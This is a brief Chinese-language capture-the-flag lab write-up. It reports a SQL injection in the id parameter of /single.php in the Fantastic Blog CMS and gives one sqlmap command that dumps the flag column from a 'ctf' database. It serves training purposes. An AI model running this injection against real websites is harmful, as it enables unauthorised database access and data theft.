Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
浏览页面的同时在single.php发现了sql注入。
sqlmap跑一下这个报文,整个靶场的flag所在的地方都差不多直接一把梭。
sqlmap -r sql.txt -D ctf -T flag -C flag --dump --batch
